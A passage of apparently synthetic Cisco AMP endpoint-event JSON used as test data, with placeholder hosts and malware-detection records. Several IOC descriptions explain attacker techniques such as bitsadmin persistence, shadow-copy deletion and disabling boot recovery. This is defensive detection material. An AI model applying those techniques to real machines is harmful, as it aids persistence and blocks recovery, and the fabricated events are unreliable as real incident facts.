IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application 